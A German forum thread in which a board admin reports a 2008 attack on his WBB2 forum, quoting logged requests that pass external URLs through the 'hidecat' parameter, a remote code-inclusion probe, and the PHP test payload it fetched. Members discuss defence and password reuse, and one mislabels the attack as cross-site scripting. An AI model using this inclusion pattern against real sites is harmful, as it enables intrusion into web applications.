Nachdem ich im Woltlab-Board und anderweitig einiges über aktuelle Hackerangriffe auf WBB2-Boards gelesen hab, checkte ich gleich mal meine diversen Logdateien...und siehe da, ich bin leider fündig geworden:
Es gab versuchte Angriffe mit dem Ziel in das Board über einen Exploit einzudringen.
Der Angriff erfolgte am 06.02.2008, 05:30:01 Uhr mit der IP: 82.194.82.172 (hs-615.dedicated.hostalia.com) aus Spanien.
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Browser-Spracheinstellung bevorzugt: Englisch / USA en-us
Referrer: nicht vorhanden
java script: nicht aktiviert o. nicht vorhanden
Seitenaufrufe: 13
Besuchte Seiten:
06.02.2008, 05:30:01 Startseite
06.02.2008, 05:30:04 Teamseite
06.02.2008, 05:30:05 Teamseite
06.02.2008, 05:30:05 Teamseite
06.02.2008, 05:30:08 Startseite (nachfolgend der übergebene Query) index.php?hidecat= http_//www.elettrodataservice.it/foto_articoli/onoda/iyegimi/& sid=[wurde von mir entfernt]
06.02.2008, 05:30:09 Startseite (nachfolgend der übergebene Query) index.php?hidecat= http_//www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/& sid=[wurde von mir entfernt]
06.02.2008, 05:30:09 Startseite (nachfolgend der übergebene Query) index.php?hidecat= http_//www.unduetretoccaate.it/codice/aseje/wocobo/& sid=[wurde von mir entfernt]
06.02.2008, 05:30:21 Teamseite
06.02.2008, 05:30:21 Registrierung
06.02.2008, 05:30:22 Registrierung
06.02.2008, 05:30:23 Formmailer
06.02.2008, 05:30:23 Teamseite
06.02.2008, 05:30:24 Teamseite
Vermutlich wurde versucht über den Query-Parameter hidecat (zuständig für das ein/ausblenden von Resorts auf der Hauptseite) ein Cookie über die SID auszulesen. Die drei URLs (orangefarben) die zu italienischen/rumänischen Seiten führen beinhalten alle gleichen folgenden PHP-Code: <?php echo md5("just_a_test");?>
Warum der PHP-Code auf der Seite überhaupt dargestellt wird ist etwas merkwürdig. Eigentlich wäre das der Fall, wenn der Provider kein PHP unterstützt. Wie auch immer...das Ganze ist mehr als verdächtig und ich bin mir ziemlich sicher hier wollte jemand über einen Exploit Cookies auslesen und in Boardinterne Bereiche eindringen.
Auch die besuchten Seiten stimmen mit den Angaben der Hack-Versuche überein, die ich auf diversen Support-Boards bezüglich Attacken gelesen habe.
Der Versuch war so wie es ausschaut wohl nicht erfolgreich, da die Version der hier verwendeten Boardsoftware bereits die Sicherheitslücke geschlossen hatte. Zusätzlich hab ich nun gerade noch eine weitere Sicherung eingebaut, die das übergeben und auslesen von nichtnumerischen Parametern (z.B. einer URL) bei showcat/hidecat ausschliesst.
Der Eindringling kam ja von hs-615.dedicated.hostalia.com. Wenn man sich die "Userhompage" dort mal anschaut, dann sieht man nur die Standardseite vom Apache-Server, die automatisch nach Installation angezeigt wird. Google spuckt über diese Adresse ein paar interessante Ergebnisse aus, alle aktuell ab Dezember 2007: hs-615.dedicated.hostalia.com
Dann kann man ja die nächsten Tage nur hoffen, dass es nicht doch noch irgendwelche Sicherheitslücken oder Exploits im Boardcode gibt und wir hier von weiteren Attacken verschont bleiben. Nicht nur von dieser zweifelhaften Adresse ausgehend.
Paradise-Quotient: 65.8 Dabei seit 01.07.2006 Wohnort: CH
Paradise Resort Candid - Master
ups...irgendwie erschreckend, aber itgendwie
auch beruhigend, da wir hier einen sehr kompetenten Admin haben.
Ich bin zuversichtlich, dass wenn weitere "Angriffe" folgen sollten, diese hier
nichts anrichten können und umgehend an PoMan's "Sicherheitsschild"
abprallen....
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
Weder noch.
Und ich hab dazu ja auch noch hier etwas geschrieben Hacken leicht gemacht...
Übrigens hat den "Hacken leicht gemacht..."-Thread weder bisher ein Gast angeschaut, noch Googlebot indiziert.
Daher denke ich, dass hat entweder mit der Woltlab-Datenbank zu tun oder weil es gerade ein "Run" auf WBB & PHPbb-Boards gibt. Wer hackt sich zuerst wo rein? Über google ist es ein leichtes WBB-Boards zu finden.
Jedenfalls sind hier die bekannten Sicherheitslücken vom WBB alle dicht und ich hab an sensiblen Orten doppelt abgesichert.
Der Angriff heute früh war ganz und garnicht unprofessionell, aber er hat glücklicherweise auch keine Wirkung gezeigt.
RE: Versuchter Hacker-Angriff auf das Paradise Resort!
Zitat von PoMan
Der Eindringling kam ja von hs-615.dedicated.hostalia.com. Wenn man sich die "Userhompage" dort mal anschaut, dann sieht man nur die Standardseite vom Apache-Server, die automatisch nach Installation angezeigt wird. Google spuckt über diese Adresse ein paar interessante Ergebnisse aus, alle aktuell ab Dezember 2007: hs-615.dedicated.hostalia.com
... das ist ein Webproxy bzw. Fremdhoster, also nicht die tatsächliche IP des Angreifers.
Der Angriff ist ein sogenannter "Cross-Site-Scripting"-Versuch. Dabei wird versucht, das PHP-Script von einem Externen Server in eine funktion einzubinden.
Selbst wenn das gelingen sollte, hat der Hacker aber immer noch nicht wirklich viel erreicht.
Er müsste dann noch genügend Plan haben, um an die SQL-Datenbank zu kommen, und von dort die
Benutzernamen und Passwörter auszulesen.
Selbst wenn er auch das schaffen sollte, ist es momentan so gut wie unmöglich, Passwörter mit mehr als 8 Zeichen länge zu entschlüsseln...
Solange also die Admins und Mods dieses Boards halbwegs vernünftige Passwörter haben, wäre selbst das
erfolgreiche Hacken ohne ein wirkliches Ergebnis...
Also nur die Ruhe :-)
Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von mikrobi: 07.02.2008 08:23
Paradise-Quotient: 46 Dabei seit 19.12.2007 Wohnort: Ba-Wü
Wow, da ich selbst (fast) keinen Durchblick über all diese technischen Details und Begriffe habe, kann ich nur hoffen, dass unsere Admins hier wirklich wissen, wovon sie reden...
Aber so wie es aussieht, kann ich da einfach mal vertrauen. PoMan scheint sich in der Materie gut auszukennen!!!
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
RE: Versuchter Hacker-Angriff auf das Paradise Resort!
Zitat von mikrobi
... das ist ein Webproxy bzw. Fremdhoster, also nicht die tatsächliche IP des Angreifers.
Der Angriff ist ein sogenannter "Cross-Site-Scripting"-Versuch. Dabei wird versucht, das PHP-Script von einem Externen Server in eine funktion einzubinden.
Selbst wenn das gelingen sollte, hat der Hacker aber immer noch nicht wirklich viel erreicht.
Er müsste dann noch genügend Plan haben, um an die SQL-Datenbank zu kommen, und von dort die
Benutzernamen und Passwörter auszulesen.
Selbst wenn er auch das schaffen sollte, ist es momentan so gut wie unmöglich, Passwörter mit mehr als 8 Zeichen länge zu entschlüsseln...
Solange also die Admins und Mods dieses Boards halbwegs vernünftige Passwörter haben, wäre selbst das
erfolgreiche Hacken ohne ein wirkliches Ergebnis...
Also nur die Ruhe :-)
Klar hab ich die Ruhe...ist ja nichts passiert. Allerdings muß ich hierbei ja auch auf die Sicherheit der Boardsoftware durch Woltlab vertrauen.
Und es ist ein Fremdhoster auf welchem das Skript (wahrscheinlich ein CGI-Skript) abgelaufen ist oder auch nur der Server der die Anfragen eines anderen Servers weiterleitet um den wahren Ursprung zu verschlüsseln.
Die übermittelte IP ist die IP des Servers, auf dem das Skript gestartet wurde. Natürlich kann man mit Sicherheit davon ausgehen, dass das Skript von dem Hacker und einer anderen IP aus gestartet wurde.
Aber das alles ist sowieso absolut nebensächlich, da hier mit Sicherheit an keine echten Daten ranzukommen sind, die den Hacker identifizieren könnten, nicht nur aufgrund internationaler Serverstandorte oder verwendeter Proxys.
Das es ein "Cross-Site-Skripting"-Versuch war, hab ich aus meinen Server-Logs lesen können. Details dazu hab ich verständlicherweise nur im interen Teamforum gepostet.
Das hier kein "Skript-Kiddie" am Werk war, hab ich an den Referrern der zig unterschiedlichen weltweit verteilten Websites gesehen, die das kurze Testskript zur Prüfung auf "Verwundbarkeit des Boardcodes" enthielten: <?php echo md5("just_a_test");?>
Würde die verbundene Website ein md5 als "Rückantwort" erhalten, wäre das ein Indiz dafür, dass fremder Code injiziert werden kann.
Insgesamt waren es in 25 Sekunden 174 Versuche per übergebene Query-Parameter und unzureichende Schutzmassnahmen im Boardcode ein Test-Skript einzuschleusen. Und sorry, wenn ich hier keine Fachausdrücke verwende, aber das liegt mir nicht so, zumal soll es ja auch einigermassen für alle verständlich sein.
Diese Lücken sind aber seit langem alle dicht im Board. Ich hab gestern auch zusätzlich noch einige wenige "Fehlabfragen" im Boardcode korrigiert, die vor der Änderung einen SQL-Fehler ausgelöst hätten.
Es wurde schon hier und da von den Programmierern des WBB zu wenig die Sicherheit beachtet, gerade was die Übergabe durch Queryparameter angeht.
Die Passwörter sind bei mir selbstverständlich sehr sicher gewählt. Was die Passwörter der S-Mods und Mods anbelangt, ist es nur nebensächlich, da nur ich als Admin Zugriff auf sehr sensible Bereiche habe. Und nicht zu vergessen der htaccess-Schutz...
RE: Versuchter Hacker-Angriff auf das Paradise Resort!
Zitat von PoMan
Was die Passwörter der S-Mods und Mods anbelangt, ist es nur nebensächlich, da nur ich als Admin Zugriff auf sehr sensible Bereiche habe. Und nicht zu vergessen der htaccess-Schutz...
So nebensächlich find ich das gar nicht, es gibt ja genügend Leute die für viele Seiten das gleiche Passwort benutzen. Und wenn mans hier ausspioniert hat kann mans ja woanders verwenden.
Also möglichst nie die gleichen Passwörter verwenden.
Signatur
**Credit to original photographers, scanners and posters...**
Paradise-Quotient: 50.9 Dabei seit 17.07.2006 Wohnort: Hamburg
man kann schon die gleichen passwörter verwenden. sehe ich nicht so das problem.
allerdings sollten dann neben groß- und kleinschreibung auch zahlen, sonderzeichen und evtl sogar leerzeichen in den passwörtern enthalten sein.
folglich also ein wirklich sicheres passwort wählen.
Signatur
"Zwei Dinge sind unendlich: Das Universum und die menschliche Dummheit, aber bei dem Universum bin ich mir noch nicht ganz sicher."
"Der Horizont mancher Menschen ist ein Kreis mit dem Radius Null und sie nennen ihn ihren Standpunkt."
Albert Einstein
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
RE: Versuchter Hacker-Angriff auf das Paradise Resort!
Zitat von M´Fashnic
Zitat von PoMan
Was die Passwörter der S-Mods und Mods anbelangt, ist es nur nebensächlich, da nur ich als Admin Zugriff auf sehr sensible Bereiche habe. Und nicht zu vergessen der htaccess-Schutz...
So nebensächlich find ich das gar nicht, es gibt ja genügend Leute die für viele Seiten das gleiche Passwort benutzen. Und wenn mans hier ausspioniert hat kann mans ja woanders verwenden.
Also möglichst nie die gleichen Passwörter verwenden.
Hehehe...nebensächlich für die Sicherheit dieses Boards.
Wenn ihr doppelt verwendete Passwörter nutzt, dann ist obliegt das eurer Verantwortung und ist aber auch trotz allem sehr "ungeschickt". Man siehe nur, was der Woltlab-Admin hier für ein Unheil angerichtet hat - nur weil er (anscheinend) das identische Passwort auf mehreren Boards verwendet hat.
Wenn ich mal Zeit und Lust habe, dann besorge ich mir ein Skript welches die User-Passwörter die in der Datenbank meines Offline-Testboards enthalten sind zu entschlüsseln vermag. Ich bezweifle aber, dass das überhaupt möglich ist...
wobei...der Boardserver muss ja auch das PW vergleichen können...
Hab mich jetzt noch nicht darum gekümmert, wie das eigentlich genau geprüft wird...
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
Hättest mal etwas weiter oben meinen Beitrag lesen sollen
Zitat von PoMan
...Das hier kein "Skript-Kiddie" am Werk war, hab ich an den Referrern der zig unterschiedlichen weltweit verteilten Websites gesehen, die das kurze Testskript zur Prüfung auf "Verwundbarkeit des Boardcodes" enthielten: <?php echo md5("just_a_test");?>
Würde die verbundene Website ein md5 als "Rückantwort" erhalten, wäre das ein Indiz dafür, dass fremder Code injiziert werden kann.
Insgesamt waren es in 25 Sekunden 174 Versuche per übergebene Query-Parameter und unzureichende Schutzmassnahmen im Boardcode ein Test-Skript einzuschleusen. Und sorry, wenn ich hier keine Fachausdrücke verwende, aber das liegt mir nicht so, zumal soll es ja auch einigermassen für alle verständlich sein...
Der damalige Angriffsversuch war alles andere als unprofessionell. Vor allem auch in der Vorarbeit schon sehr aufwendig.
Man denke mal an die vielen involvierten Websites zur Verwundbarkeitsprüfung...
Aber das alles war nur ein kurzes Aufflammen...ist seitdem wieder so "ruhig" wie immer. Ganz ruhig ist es leider nie.
Tagtäglich sind in den Server/Error-Logs Angriffsversuche auf paradiseresort.de (und meine anderen Domains)
Aber das ist ganz normal...leider. Und sind sowieso alles harmlose, stümperhafte BruteForce-Attacken die allesamt ins Leere laufen.
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
Hab dein zitiertes wieder herausgenommen, war sehr sperrig und eher unnötig so direkt nach dem "Original"
Wollte nur noch dazu anmerken, dass ich schon so einiges hier im Griff habe, aber dass das noch lange nicht heisst,
das Paradise Resort wäre sicher gegen all diese bösen Buben im Web.
Sicher ist im Web eigentlich garnichts. Dazu gibt es viel zu viel bugverseuchte Software...
Allerdings achte ich sehr auf die Sicherheit, bei der Auswahl der verwendeten Software sowie auch bei der
Absicherung diverser "empfindlicher" Bereiche durch sichere Passwörter und serverseitigen Passwortschutz (htaccess)
Auf ein sicheres Paradise Resort - sicher genug um sich hier wohlzufühlen.
Viele Boards haben täglich im Schnitt mehrere Angriffe zu verzeichnen sowie die Versuche der hacker über admin accounts an die Boards heranzukommen.
Wirklich gute Hacker werden im Allgemeinen auch Erfolg haben, wenn man sie nicht rechtzeitig bemerkt, da es überall Sicherheitslücken gibt
Ich selbst finde es traurig, dass diese Leute sich Boards als "Trainingsziele" aussuchen, wobei es aber oft leider auch andere Gründe gibt Boards anzugreifen.
Gut jedenfalls, dass es in diesem Fall nicht geklappt hat.
Drücke die Daumen, dass auch zukünftig keiner "durchkommen" wird
Und auch das erste Suchergebnis auf Google liefert den Beweis celebritycity einfach mal "Im Cache" anklicken.
Cache vom 18. März 2008, 5:49 Uhr!
Das kommt davon, wenn man dem Googlebot die Archivierung der Seite erlaubt.
Hab ich fürs PR deaktiviert. Die Suchmaschinen-Archivierung macht ja auch keinen vernünftigen Sinn bei
dynamischen PHP-Seiten, vor allem bei einem Board.
Na jedenfalls, hättest ruhig erzählen können, dass dein Homeboard gehackt wurde.
Muss doch niemanden peinlich sein...peinlicher wirds, wenn Google die Wahrheit aufdeckt...
Und ein Festplatten-Crash (hab gehört, dass Du diese Info rausgegeben hast) dauert mit Sicherheit keine 10 Tage.
Habt ihr denn keinen Zugriff mehr auf euren Server?
Was ist das nur für ein mieser Hoster, den ihr da habt? Und wieso schaltet ihr keine vernünftige Info-Seite auf?
Das kann man doch nicht so stehen lassen, mit dem "Critical Error"
Das Paradise Resort hat schon sehr lange eine Info-Domain - völlig unabhängig vom Board-Server: Status-Domain bei Serverausfall
Das war bei dem (wirklichen) Festplatten-Crash meines Hosters Mitte Dezember hab ich sofort reagiert und unser
Board war innerhalb weniger Tage wieder online. Noch dazu auf einem grösseren Server mit mehr Ressourcen. Wichtige Infos zum Relaunch vom Paradise Resort
So oder so, ist es auf jeden Fall eine Riesensauerei mit der Hackerei...
Ich wünsche dir und euch auf www.thecelebritycity.com jedenfalls alles Gute, dass ihr den Server und das Board
in Kürze wieder hinbekommt, hoffe ihr habt auch fleissig Backups gemacht.
Und mein Tipp: schaltet dann eine Info-Domain auf, ist immer gut wenn man seine Community informieren
und auf dem aktuellen Stand halten kann.
Allerdings gibt es an dieser Stelle einiges klarzustellen, nach all diesen Vermutungen.
1. Das board wurde nie gehackt
2. Es war ein Festplattencrash
3. es ist ein temporärer Server, der uns zwischenzeitlich zur Verfügung gestellt wurde, bis wir auf den endgültigen Server umziehen
4. Nachdem die Daten restauriert worden waren stellte sich heraus dass die alte Datenbank defekt war (daher die Medlung hack attempt)
5. Unser Techniker ist offensichtlich im Osterurlaub, und war daher nicht in der Lage das Backup aufzuspielen.
6. Zwischenzeitlich war die Meldung Maintanance eingestellt, nachdem beim hoster allerdings die Festplatten gewechselt wurden hat es wohl erneut Fehlermeldungen gegeben
7. Wir haben uns entschlossen das Board erst wieder zu eröffnen, wenn der neue Server zur Verfügung steht und eingerichtet ist, da der temporäre eh zu langsam für unsere Bedürfnisse ist, und wir es den usern nicht zumuen möchten jetzt dort wieder online zu gehen und ihnen mitzuteilen, dass nochmals eine Downtime wegend es umzugs bevorsteht.
8. und letztens: Selbst wenn es einen Hack attempt gegeben hätte, dann wäre das board sicher nicht über einen so langen Zeitraum down, da wir backups haben (täglich, teilweise mehrfach), die es uns anschließend erlauben würden, das Board binnen kurzer Zeit wieder hochzufahren (mit vernachlässigbar geringem Datenverlust).
Das Problem besteht einfach darin, dass der neue Server noch nicht bereit und der techniker nicht verfügbar ist (ja, es gibt reichlich Techniker, aber auch gute die ich zwischenzeitlich gebeten hatte auszuhelfen habe Probleme damit das backup aufzuspielen, daher warte ich auf unseren regulären Techniker, bevor wir eine Info hearusgeben).
Btw, der Googlebot ist bei uns deaktiviert
Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Messias: 28.03.2008 10:38
Paradise-Quotient: 64.8 Dabei seit 01.07.2006 Wohnort: EU-DE-BW-LB
Der Admin, der niemals schläft
Danke für die Infos
Ich hoffe auch eure Community ist darüber aufgeklärt worden...gehört einfach "zum guten Ton"
Jedenfalls siehst Du ja, was man sich so zusammenreimt, wenn man sich nur per Suchmaschine
die Infos zusammenklauben kann. Möchte ja nicht wissen, wieviele meinen Weg gegangen sind...
Und das eine defekte Datenbank einen "Hack Attempt" ausgibt ist mir neu...aber sei's drum. Wer weiss,
was für Security-Tools ihr da installiert habt.
Aber das der GoogleBot bei euch "deaktiviert" ist, ich aber trotzdem diese hochaktuellen Ergebnisse geliefert
bekomme ist schon sehr merkwürdig...
Nur um das thema CC zum Abschluß zu bringen. Da der genaue termin für den neuen Server noch nicht steht haben wir uns zwischenzeitlich entschlossen vorher wieder Online zu gehen.
Das Board ist seit gestern erst einmal wieder auf dem temp Server zurück
MEINE VIDEOS - AKTUELL ONLINE 
Zitat von PoMan
Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von mikrobi: 07.02.2008 08:23
Hab mich jetzt noch nicht darum gekümmert, wie das eigentlich genau geprüft wird... 
- aber Du scheinst das im Griff zu haben 
